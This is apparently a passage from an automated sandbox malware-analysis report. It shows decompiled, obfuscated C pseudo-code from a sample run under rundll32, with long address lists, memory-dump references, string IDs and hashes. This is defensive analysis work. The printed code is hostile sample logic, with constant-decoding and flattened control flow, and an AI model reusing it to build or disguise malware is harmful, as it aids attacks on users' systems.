                                                                                                                      							if(_t627 != 0) {
                                                                                                                      								_t602 = 0x4d28763;
                                                                                                                      								__eflags = _t706 - 0x4d28763;
                                                                                                                      								_t647 = 0x87702da;
                                                                                                                      								_t708 =  ==  ? 0x87702da : 0x2649e52;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						_t708 = 0x7bff6cd;
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00173328
                                                                                                                      0x0017332b
                                                                                                                      0x0017332f
                                                                                                                      0x00173337
                                                                                                                      0x0017334a
                                                                                                                      0x00173351
                                                                                                                      0x0017335c
                                                                                                                      0x00173364
                                                                                                                      0x00173369
                                                                                                                      0x00173371
                                                                                                                      0x00173379
                                                                                                                      0x00173381
                                                                                                                      0x00173389
                                                                                                                      0x00173396
                                                                                                                      0x0017339a
                                                                                                                      0x001733a2
                                                                                                                      0x001733ad
                                                                                                                      0x001733b5
                                                                                                                      0x001733c0
                                                                                                                      0x001733cb
                                                                                                                      0x001733d3
                                                                                                                      0x001733de
                                                                                                                      0x001733eb
                                                                                                                      0x001733ec
                                                                                                                      0x001733f6
                                                                                                                      0x001733fc
                                                                                                                      0x00173400
                                                                                                                      0x00173408
                                                                                                                      0x00173410
                                                                                                                      0x00173418
                                                                                                                      0x00173420
                                                                                                                      0x00173425
                                                                                                                      0x0017342d
                                                                                                                      0x00173435
                                                                                                                      0x0017343d
                                                                                                                      0x00173445
                                                                                                                      0x0017344d
                                                                                                                      0x00173455
                                                                                                                      0x0017345d
                                                                                                                      0x00173465
                                                                                                                      0x0017346a
                                                                                                                      0x00173472
                                                                                                                      0x0017347d
                                                                                                                      0x0017348f
                                                                                                                      0x00173492
                                                                                                                      0x00173499
                                                                                                                      0x001734a4
                                                                                                                      0x001734af
                                                                                                                      0x001734ba
                                                                                                                      0x001734c5
                                                                                                                      0x001734d8
                                                                                                                      0x001734e7
                                                                                                                      0x001734ee
                                                                                                                      0x001734f9
                                                                                                                      0x00173501
                                                                                                                      0x00173511
                                                                                                                      0x00173519
                                                                                                                      0x0017351e
                                                                                                                      0x00173524
                                                                                                                      0x0017352c
                                                                                                                      0x00173537
                                                                                                                      0x0017353f
                                                                                                                      0x00173547
                                                                                                                      0x00173552
                                                                                                                      0x0017355d
                                                                                                                      0x00173568
                                                                                                                      0x00173573
                                                                                                                      0x0017357f
                                                                                                                      0x00173582
                                                                                                                      0x00173586
                                                                                                                      0x0017358e
                                                                                                                      0x00173596
                                                                                                                      0x0017359e
                                                                                                                      0x001735a6
                                                                                                                      0x001735ab
                                                                                                                      0x001735b3
                                                                                                                      0x001735c0
                                                                                                                      0x001735c4
                                                                                                                      0x001735cc
                                                                                                                      0x001735d4
                                                                                                                      0x001735df
                                                                                                                      0x001735ea
                                                                                                                      0x001735f5
                                                                                                                      0x00173600
                                                                                                                      0x0017360b
                                                                                                                      0x00173616
                                                                                                                      0x00173629
                                                                                                                      0x00173630
                                                                                                                      0x0017363b
                                                                                                                      0x00173648
                                                                                                                      0x0017365c
                                                                                                                      0x00173661
                                                                                                                      0x0017366a
                                                                                                                      0x00173675
                                                                                                                      0x00173680
                                                                                                                      0x00173688
                                                                                                                      0x00173693
                                                                                                                      0x0017369e
                                                                                                                      0x001736b0
                                                                                                                      0x001736b5
                                                                                                                      0x001736be
                                                                                                                      0x001736c9
                                                                                                                      0x001736dc
                                                                                                                      0x001736df
                                                                                                                      0x001736ee
                                                                                                                      0x001736f5
                                                                                                                      0x00173700
                                                                                                                      0x00173710
                                                                                                                      0x00173714
                                                                                                                      0x0017371c
                                                                                                                      0x00173724
                                                                                                                      0x0017372c
                                                                                                                      0x00173734
                                                                                                                      0x0017373c
                                                                                                                      0x00173745
                                                                                                                      0x00173748
                                                                                                                      0x0017374c
                                                                                                                      0x00173754
                                                                                                                      0x0017375f
                                                                                                                      0x0017376a
                                                                                                                      0x00173771
                                                                                                                      0x00173778
                                                                                                                      0x0017377d
                                                                                                                      0x00173786
                                                                                                                      0x00173791
                                                                                                                      0x0017379c
                                                                                                                      0x001737a7
                                                                                                                      0x001737b2
                                                                                                                      0x001737ba
                                                                                                                      0x001737c6
                                                                                                                      0x001737cb
                                                                                                                      0x001737d1
                                                                                                                      0x001737d9
                                                                                                                      0x001737e1
                                                                                                                      0x001737e9
                                                                                                                      0x001737f5
                                                                                                                      0x001737f8
                                                                                                                      0x001737fc
                                                                                                                      0x00173804
                                                                                                                      0x0017380c
                                                                                                                      0x00173817
                                                                                                                      0x00173824
                                                                                                                      0x0017382f
                                                                                                                      0x0017383a
                                                                                                                      0x00173842
                                                                                                                      0x0017384d
                                                                                                                      0x00173858
                                                                                                                      0x0017386b
                                                                                                                      0x00173872
                                                                                                                      0x0017387d
                                                                                                                      0x00173888
                                                                                                                      0x00173893
                                                                                                                      0x0017389e
                                                                                                                      0x001738a9
                                                                                                                      0x001738b0
                                                                                                                      0x001738b0
                                                                                                                      0x001738b0
                                                                                                                      0x001738b5
                                                                                                                      0x001738b5
                                                                                                                      0x001738b5
                                                                                                                      0x00000000
                                                                                                                      0x001738ba
                                                                                                                      0x001738cc
                                                                                                                      0x00173b5f
                                                                                                                      0x00173b6d
                                                                                                                      0x00173b74
                                                                                                                      0x00173b7b
                                                                                                                      0x00173b83
                                                                                                                      0x00173b84
                                                                                                                      0x00173b92
                                                                                                                      0x00173b93
                                                                                                                      0x00173b97
                                                                                                                      0x00173b9c
                                                                                                                      0x00173b9f
                                                                                                                      0x00173ba1
                                                                                                                      0x00173bf7
                                                                                                                      0x00173bf7
                                                                                                                      0x00173bf7
                                                                                                                      0x00173bc0
                                                                                                                      0x00173bc5
                                                                                                                      0x00173bc8
                                                                                                                      0x00173bcc
                                                                                                                      0x00173bd0
                                                                                                                      0x00173bd7
                                                                                                                      0x00173bde
                                                                                                                      0x00173be5
                                                                                                                      0x00000000
                                                                                                                      0x00173bea
                                                                                                                      0x001738d4
                                                                                                                      0x00173b37
                                                                                                                      0x00173b3e
                                                                                                                      0x00173b45
                                                                                                                      0x00173b4c
                                                                                                                      0x00173b53
                                                                                                                      0x00000000
                                                                                                                      0x00173b53
                                                                                                                      0x001738e0
                                                                                                                      0x00173add
                                                                                                                      0x00173adf
                                                                                                                      0x00173b17
                                                                                                                      0x00000000
                                                                                                                      0x00173b17
                                                                                                                      0x00173ae1
                                                                                                                      0x00173afd
                                                                                                                      0x00173b02
                                                                                                                      0x00173b05
                                                                                                                      0x00173b07
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00173b0d
                                                                                                                      0x001738b0
                                                                                                                      0x001738b0
                                                                                                                      0x001738b0
                                                                                                                      0x001738b5
                                                                                                                      0x001738b5
                                                                                                                      0x00000000
                                                                                                                      0x001738b5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Fs$+M$4l$5N$AX$[e$[p;$^ "0$`h$aGK{$x`~${2$@"
                                                                                                                      • API String ID: 0-3551049037
                                                                                                                      • Opcode ID: 334b3f3ed5fc1b1b05f12e18cea9be60a250f22517f2bda9fd9c7e032a3f0d29
                                                                                                                      • Instruction ID: 454a083beccb63d15b77bd15e82a0d26dd2faedaa1d77205a1ef751070b35d92
                                                                                                                      • Opcode Fuzzy Hash: 334b3f3ed5fc1b1b05f12e18cea9be60a250f22517f2bda9fd9c7e032a3f0d29
                                                                                                                      • Instruction Fuzzy Hash: FA5200725093819FD379CF21C54AB9BBBE2BBC4708F10891DE2DA96260D7B18949DF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018D8D7() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				unsigned int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				void* _t526;
                                                                                                                      				signed int _t531;
                                                                                                                      				void* _t540;
                                                                                                                      				intOrPtr _t544;
                                                                                                                      				intOrPtr _t546;
                                                                                                                      				signed int _t550;
                                                                                                                      				intOrPtr _t551;
                                                                                                                      				signed int _t552;
                                                                                                                      				signed int _t553;
                                                                                                                      				signed int _t554;
                                                                                                                      				signed int _t555;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int _t557;
                                                                                                                      				signed int _t558;
                                                                                                                      				signed int _t559;
                                                                                                                      				signed int _t560;
                                                                                                                      				signed int _t561;
                                                                                                                      				signed int _t562;
                                                                                                                      				signed int _t563;
                                                                                                                      				signed int _t564;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t566;
                                                                                                                      				signed int _t567;
                                                                                                                      				void* _t568;
                                                                                                                      				void* _t625;
                                                                                                                      				signed int _t627;
                                                                                                                      				signed int* _t631;
                                                                                                                      
                                                                                                                      				_t631 =  &_v1760;
                                                                                                                      				_v1616 = 0xeae527;
                                                                                                                      				_v1568 = 0;
                                                                                                                      				_t553 = 0x26;
                                                                                                                      				_v1616 = _v1616 / _t553;
                                                                                                                      				_v1616 = _v1616 ^ 0x00062e5a;
                                                                                                                      				_t625 = 0x971d92c;
                                                                                                                      				_v1596 = 0x6602e1;
                                                                                                                      				_t554 = 0x25;
                                                                                                                      				_v1596 = _v1596 / _t554;
                                                                                                                      				_v1596 = _v1596 ^ 0x8002c1cf;
                                                                                                                      				_v1644 = 0xf63434;
                                                                                                                      				_t555 = 0x47;
                                                                                                                      				_v1644 = _v1644 / _t555;
                                                                                                                      				_v1644 = _v1644 + 0xf19c;
                                                                                                                      				_v1644 = _v1644 ^ 0x00046956;
                                                                                                                      				_v1716 = 0x50524a;
                                                                                                                      				_t32 =  &_v1716; // 0x50524a
                                                                                                                      				_t556 = 0x5f;
                                                                                                                      				_v1716 =  *_t32 / _t556;
                                                                                                                      				_v1716 = _v1716 + 0xeb9a;
                                                                                                                      				_v1716 = _v1716 >> 0x10;
                                                                                                                      				_v1696 = 0xd12665;
                                                                                                                      				_v1696 = _v1696 + 0xba99;
                                                                                                                      				_v1696 = _v1696 >> 2;
                                                                                                                      				_v1696 = _v1696 ^ 0x003ae3d7;
                                                                                                                      				_v1572 = 0xb7077f;
                                                                                                                      				_v1572 = _v1572 >> 0xb;
                                                                                                                      				_v1572 = _v1572 ^ 0x00005559;
                                                                                                                      				_v1732 = 0xacadbb;
                                                                                                                      				_v1732 = _v1732 * 0x18;
                                                                                                                      				_v1732 = _v1732 + 0xffff3f00;
                                                                                                                      				_v1732 = _v1732 >> 0xb;
                                                                                                                      				_v1732 = _v1732 ^ 0x0000fc07;
                                                                                                                      				_v1628 = 0x1e838c;
                                                                                                                      				_v1628 = _v1628 + 0xffff51c5;
                                                                                                                      				_v1628 = _v1628 * 0x68;
                                                                                                                      				_v1628 = _v1628 ^ 0x0c18a6b3;
                                                                                                                      				_v1712 = 0x7a729f;
                                                                                                                      				_v1712 = _v1712 | 0x553aa77e;
                                                                                                                      				_v1712 = _v1712 ^ 0x421b02cb;
                                                                                                                      				_v1712 = _v1712 * 0x57;
                                                                                                                      				_v1712 = _v1712 ^ 0xf24da14c;
                                                                                                                      				_v1620 = 0x85e70f;
                                                                                                                      				_v1620 = _v1620 >> 0xb;
                                                                                                                      				_v1620 = _v1620 ^ 0x000e59ba;
                                                                                                                      				_v1752 = 0xad6578;
                                                                                                                      				_v1752 = _v1752 * 0x5a;
                                                                                                                      				_v1752 = _v1752 << 0xc;
                                                                                                                      				_v1752 = _v1752 << 0x10;
                                                                                                                      				_v1752 = _v1752 ^ 0x00023595;
                                                                                                                      				_v1728 = 0x3989b2;
                                                                                                                      				_v1728 = _v1728 * 0x27;
                                                                                                                      				_v1728 = _v1728 * 0x4d;
                                                                                                                      				_v1728 = _v1728 << 4;
                                                                                                                      				_v1728 = _v1728 ^ 0x2f238c3a;
                                                                                                                      				_v1744 = 0x50e625;
                                                                                                                      				_v1744 = _v1744 ^ 0x2e9ac150;
                                                                                                                      				_v1744 = _v1744 >> 2;
                                                                                                                      				_v1744 = _v1744 >> 5;
                                                                                                                      				_v1744 = _v1744 ^ 0x00596b64;
                                                                                                                      				_v1684 = 0x3fc833;
                                                                                                                      				_t557 = 0x76;
                                                                                                                      				_v1684 = _v1684 / _t557;
                                                                                                                      				_v1684 = _v1684 ^ 0xe050a76e;
                                                                                                                      				_v1684 = _v1684 ^ 0xe05ba95d;
                                                                                                                      				_v1576 = 0x904481;
                                                                                                                      				_v1576 = _v1576 | 0xbb34e4d7;
                                                                                                                      				_v1576 = _v1576 ^ 0xbbb7ee3e;
                                                                                                                      				_v1612 = 0xe49eb3;
                                                                                                                      				_v1612 = _v1612 + 0xfa7c;
                                                                                                                      				_v1612 = _v1612 ^ 0x00e777f0;
                                                                                                                      				_v1624 = 0x2dc9df;
                                                                                                                      				_v1624 = _v1624 ^ 0xfde67a02;
                                                                                                                      				_v1624 = _v1624 >> 4;
                                                                                                                      				_v1624 = _v1624 ^ 0x0fd7f95a;
                                                                                                                      				_v1688 = 0xb27c91;
                                                                                                                      				_v1688 = _v1688 + 0xcc48;
                                                                                                                      				_v1688 = _v1688 + 0xffff6aea;
                                                                                                                      				_v1688 = _v1688 ^ 0x00b739bb;
                                                                                                                      				_v1676 = 0x9962ec;
                                                                                                                      				_v1676 = _v1676 + 0xd2bc;
                                                                                                                      				_t627 = 0x59;
                                                                                                                      				_t558 = 0x22;
                                                                                                                      				_v1676 = _v1676 * 0x31;
                                                                                                                      				_v1676 = _v1676 ^ 0x1d838c0c;
                                                                                                                      				_v1720 = 0x20e7d3;
                                                                                                                      				_v1720 = _v1720 / _t627;
                                                                                                                      				_v1720 = _v1720 / _t558;
                                                                                                                      				_v1720 = _v1720 / _t627;
                                                                                                                      				_v1720 = _v1720 ^ 0x0002b2fc;
                                                                                                                      				_v1652 = 0xf809ca;
                                                                                                                      				_v1652 = _v1652 | 0xf7ee8eed;
                                                                                                                      				_v1652 = _v1652 << 1;
                                                                                                                      				_v1652 = _v1652 ^ 0xeff238d7;
                                                                                                                      				_v1580 = 0x7cb108;
                                                                                                                      				_v1580 = _v1580 + 0x41b4;
                                                                                                                      				_v1580 = _v1580 ^ 0x0076b4d3;
                                                                                                                      				_v1668 = 0xb3209d;
                                                                                                                      				_t559 = 0x53;
                                                                                                                      				_v1668 = _v1668 / _t559;
                                                                                                                      				_v1668 = _v1668 << 0xd;
                                                                                                                      				_v1668 = _v1668 ^ 0x450753ed;
                                                                                                                      				_v1604 = 0x53775b;
                                                                                                                      				_v1604 = _v1604 | 0x32a41867;
                                                                                                                      				_v1604 = _v1604 ^ 0x32fba052;
                                                                                                                      				_v1636 = 0xbc3265;
                                                                                                                      				_v1636 = _v1636 + 0xffff23eb;
                                                                                                                      				_v1636 = _v1636 ^ 0xe68a0726;
                                                                                                                      				_v1636 = _v1636 ^ 0xe63f3d4e;
                                                                                                                      				_v1756 = 0xe1916f;
                                                                                                                      				_v1756 = _v1756 + 0x6ec8;
                                                                                                                      				_v1756 = _v1756 | 0xf937d932;
                                                                                                                      				_v1756 = _v1756 + 0xfffffd3f;
                                                                                                                      				_v1756 = _v1756 ^ 0xf9f085ba;
                                                                                                                      				_v1588 = 0x69c4ca;
                                                                                                                      				_v1588 = _v1588 + 0xe8a1;
                                                                                                                      				_v1588 = _v1588 ^ 0x00630ca4;
                                                                                                                      				_v1584 = 0x6b201e;
                                                                                                                      				_v1584 = _v1584 | 0x74aee044;
                                                                                                                      				_v1584 = _v1584 ^ 0x74eba3bf;
                                                                                                                      				_v1760 = 0xf230ab;
                                                                                                                      				_v1760 = _v1760 >> 9;
                                                                                                                      				_v1760 = _v1760 >> 0xa;
                                                                                                                      				_v1760 = _v1760 >> 4;
                                                                                                                      				_v1760 = _v1760 ^ 0x00016a96;
                                                                                                                      				_v1704 = 0x98b305;
                                                                                                                      				_v1704 = _v1704 + 0x69fd;
                                                                                                                      				_v1704 = _v1704 ^ 0x979b8a6a;
                                                                                                                      				_v1704 = _v1704 + 0xffff998b;
                                                                                                                      				_v1704 = _v1704 ^ 0x9709d1d7;
                                                                                                                      				_v1736 = 0xce8702;
                                                                                                                      				_v1736 = _v1736 >> 0xa;
                                                                                                                      				_v1736 = _v1736 + 0x7a8b;
                                                                                                                      				_v1736 = _v1736 << 1;
                                                                                                                      				_v1736 = _v1736 ^ 0x000e6a30;
                                                                                                                      				_v1740 = 0x4c6a4b;
                                                                                                                      				_v1740 = _v1740 << 0xb;
                                                                                                                      				_v1740 = _v1740 | 0x0577b2ac;
                                                                                                                      				_v1740 = _v1740 + 0xffff4db5;
                                                                                                                      				_v1740 = _v1740 ^ 0x6775c844;
                                                                                                                      				_v1748 = 0x8b8c8;
                                                                                                                      				_t560 = 0x14;
                                                                                                                      				_v1748 = _v1748 / _t560;
                                                                                                                      				_t561 = 0x67;
                                                                                                                      				_v1748 = _v1748 / _t561;
                                                                                                                      				_t562 = 7;
                                                                                                                      				_v1748 = _v1748 * 0x36;
                                                                                                                      				_v1748 = _v1748 ^ 0x000fee79;
                                                                                                                      				_v1660 = 0xc3e5ac;
                                                                                                                      				_v1660 = _v1660 + 0xffffa1ff;
                                                                                                                      				_t563 = 0x46;
                                                                                                                      				_v1660 = _v1660 / _t562;
                                                                                                                      				_v1660 = _v1660 ^ 0x001e32d9;
                                                                                                                      				_v1664 = 0x1a636c;
                                                                                                                      				_v1664 = _v1664 | 0xf6dbfbcf;
                                                                                                                      				_v1664 = _v1664 ^ 0xf6df054d;
                                                                                                                      				_v1724 = 0xea18bc;
                                                                                                                      				_v1724 = _v1724 / _t563;
                                                                                                                      				_v1724 = _v1724 | 0x2d596700;
                                                                                                                      				_v1724 = _v1724 >> 1;
                                                                                                                      				_v1724 = _v1724 ^ 0x16a5f059;
                                                                                                                      				_v1672 = 0x567483;
                                                                                                                      				_v1672 = _v1672 >> 7;
                                                                                                                      				_v1672 = _v1672 + 0xffffe0a0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000eacf4;
                                                                                                                      				_v1680 = 0x757070;
                                                                                                                      				_v1680 = _v1680 >> 0xd;
                                                                                                                      				_v1680 = _v1680 ^ 0xeacc73ee;
                                                                                                                      				_v1680 = _v1680 ^ 0xeac5b183;
                                                                                                                      				_v1648 = 0x45ab81;
                                                                                                                      				_v1648 = _v1648 >> 6;
                                                                                                                      				_v1648 = _v1648 + 0xffff50ab;
                                                                                                                      				_v1648 = _v1648 ^ 0x000d5f86;
                                                                                                                      				_v1708 = 0x462580;
                                                                                                                      				_t564 = 0xb;
                                                                                                                      				_t550 = _v1568;
                                                                                                                      				_v1708 = _v1708 / _t564;
                                                                                                                      				_t565 = 0x75;
                                                                                                                      				_v1708 = _v1708 / _t565;
                                                                                                                      				_t566 = 0x37;
                                                                                                                      				_v1708 = _v1708 * 0x50;
                                                                                                                      				_v1708 = _v1708 ^ 0x00078e43;
                                                                                                                      				_v1592 = 0x6b02b0;
                                                                                                                      				_v1592 = _v1592 + 0xffff70eb;
                                                                                                                      				_v1592 = _v1592 ^ 0x006caa59;
                                                                                                                      				_v1600 = 0x2f56d1;
                                                                                                                      				_v1600 = _v1600 ^ 0x1dd1a998;
                                                                                                                      				_v1600 = _v1600 ^ 0x1df0badb;
                                                                                                                      				_v1656 = 0xa683af;
                                                                                                                      				_v1656 = _v1656 / _t566;
                                                                                                                      				_v1656 = _v1656 << 1;
                                                                                                                      				_v1656 = _v1656 ^ 0x0003d06f;
                                                                                                                      				_v1608 = 0x6ef6d9;
                                                                                                                      				_v1608 = _v1608 + 0xd0f0;
                                                                                                                      				_v1608 = _v1608 ^ 0x006391fa;
                                                                                                                      				_v1700 = 0x90b08b;
                                                                                                                      				_v1700 = _v1700 + 0x4c46;
                                                                                                                      				_v1700 = _v1700 | 0x5cc03ba9;
                                                                                                                      				_t567 = 0x12;
                                                                                                                      				_v1700 = _v1700 / _t567;
                                                                                                                      				_v1700 = _v1700 ^ 0x052b7d82;
                                                                                                                      				_v1692 = 0x3d9f33;
                                                                                                                      				_v1692 = _v1692 + 0xffff6a07;
                                                                                                                      				_v1692 = _v1692 ^ 0xa1c8547f;
                                                                                                                      				_v1692 = _v1692 ^ 0xa1f3c56b;
                                                                                                                      				_v1632 = 0x96979b;
                                                                                                                      				_v1632 = _v1632 / _t627;
                                                                                                                      				_v1632 = _v1632 >> 0xa;
                                                                                                                      				_v1632 = _v1632 ^ 0x0009a5bf;
                                                                                                                      				_v1640 = 0x6f31a2;
                                                                                                                      				_v1640 = _v1640 ^ 0x3a2ad5a2;
                                                                                                                      				_v1640 = _v1640 ^ 0xeb2d3a23;
                                                                                                                      				_v1640 = _v1640 ^ 0xd16332d1;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t568 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t526 = 0xdd30c3;
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							if(_t625 == _t526) {
                                                                                                                      								_t531 = E0018C2CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E0018BA68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
                                                                                                                      								_t631 =  &(_t631[0xd]);
                                                                                                                      								__eflags = _t531;
                                                                                                                      								_t625 = 0xd26443e;
                                                                                                                      								_t471 = _t531 == 0;
                                                                                                                      								__eflags = _t471;
                                                                                                                      								_v1568 = 0 | _t471;
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								if(_t625 == 0x971d92c) {
                                                                                                                      									_push(_t568);
                                                                                                                      									E0017EA7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
                                                                                                                      									_t631 =  &(_t631[7]);
                                                                                                                      									_t625 = 0xf5a31c5;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									if(_t625 == 0x9b520f4) {
                                                                                                                      										_t551 =  *0x19520c; // 0x0
                                                                                                                      										_t552 = _t551 + 0x220;
                                                                                                                      										while(1) {
                                                                                                                      											__eflags =  *_t552 - _t568;
                                                                                                                      											if(__eflags == 0) {
                                                                                                                      												break;
                                                                                                                      											}
                                                                                                                      											_t552 = _t552 + 2;
                                                                                                                      											__eflags = _t552;
                                                                                                                      										}
                                                                                                                      										_t550 = _t552 + 2;
                                                                                                                      										_t625 = 0xaa323c9;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t625 == 0xaa323c9) {
                                                                                                                      											_push(_v1636);
                                                                                                                      											_push(_v1604);
                                                                                                                      											_t572 = _v1580;
                                                                                                                      											_push(0x17118c);
                                                                                                                      											__eflags = E00178786(_v1756, _v1668, _v1580,  &_v1564, _v1588, E0017AB66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
                                                                                                                      											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
                                                                                                                      											E0017AE03(_v1740, _v1748, _v1660, _t534);
                                                                                                                      											_t631 =  &(_t631[0x12]);
                                                                                                                      											L17:
                                                                                                                      											_t526 = 0xdd30c3;
                                                                                                                      											_t568 = 0x5c;
                                                                                                                      											goto L18;
                                                                                                                      										} else {
                                                                                                                      											if(_t625 == 0xd26443e) {
                                                                                                                      												E00177AF8(_v1700, _v1692, _v1564, _v1632, _v1640);
                                                                                                                      											} else {
                                                                                                                      												_t640 = _t625 - 0xf5a31c5;
                                                                                                                      												if(_t625 != 0xf5a31c5) {
                                                                                                                      													goto L18;
                                                                                                                      												} else {
                                                                                                                      													_push(_v1728);
                                                                                                                      													_push(_v1752);
                                                                                                                      													_push(0x1710fc);
                                                                                                                      													_t540 = E0017AB66(_v1712, _v1620, _t640);
                                                                                                                      													E0018C66E( &_v1040, _t640);
                                                                                                                      													_t544 =  *0x19520c; // 0x0
                                                                                                                      													_t546 =  *0x19520c; // 0x0
                                                                                                                      													_t427 =  &_v1684; // 0xe63f3d4e
                                                                                                                      													E0018BDB5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612, _t546 + 0x220, _v1624, _v1688, _t544 + 8,  &_v1040,  &_v520, _t540);
                                                                                                                      													E0017AE03(_v1676, _v1720, _v1652, _t540);
                                                                                                                      													_t631 =  &(_t631[0x10]);
                                                                                                                      													_t625 = 0x9b520f4;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t568 = 0x5c;
                                                                                                                      														L2:
                                                                                                                      														_t526 = 0xdd30c3;
                                                                                                                      														goto L3;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L21:
                                                                                                                      							return _v1568;
                                                                                                                      							L18:
                                                                                                                      							__eflags = _t625 - 0x546d466;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0018e125
                                                                                                                      0x0018e12c
                                                                                                                      0x0018e179
                                                                                                                      0x0018e195
                                                                                                                      0x0018e198
                                                                                                                      0x0018e19d
                                                                                                                      0x0018e278
                                                                                                                      0x0018e27a
                                                                                                                      0x0018e27f
                                                                                                                      0x00000000
                                                                                                                      0x0018e051
                                                                                                                      0x0018e057
                                                                                                                      0x0018e2ab
                                                                                                                      0x0018e05d
                                                                                                                      0x0018e05d
                                                                                                                      0x0018e063
                                                                                                                      0x00000000
                                                                                                                      0x0018e069
                                                                                                                      0x0018e069
                                                                                                                      0x0018e06d
                                                                                                                      0x0018e07c
                                                                                                                      0x0018e081
                                                                                                                      0x0018e08f
                                                                                                                      0x0018e0aa
                                                                                                                      0x0018e0c5
                                                                                                                      0x0018e0de
                                                                                                                      0x0018e0e9
                                                                                                                      0x0018e101
                                                                                                                      0x0018e106
                                                                                                                      0x0018e109
                                                                                                                      0x0018e021
                                                                                                                      0x0018e021
                                                                                                                      0x0018e023
                                                                                                                      0x0018e024
                                                                                                                      0x0018e024
                                                                                                                      0x00000000
                                                                                                                      0x0018e024
                                                                                                                      0x0018e021
                                                                                                                      0x0018e063
                                                                                                                      0x0018e057
                                                                                                                      0x0018e04b
                                                                                                                      0x0018e043
                                                                                                                      0x0018e037
                                                                                                                      0x0018e2b3
                                                                                                                      0x0018e2c4
                                                                                                                      0x0018e280
                                                                                                                      0x0018e280
                                                                                                                      0x0018e280
                                                                                                                      0x00000000
                                                                                                                      0x0018e28c
                                                                                                                      0x0018e024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 844e1a6f6fc519cc7e6a2814eb35c08057b69925ed6020bbd54e9254ca568998
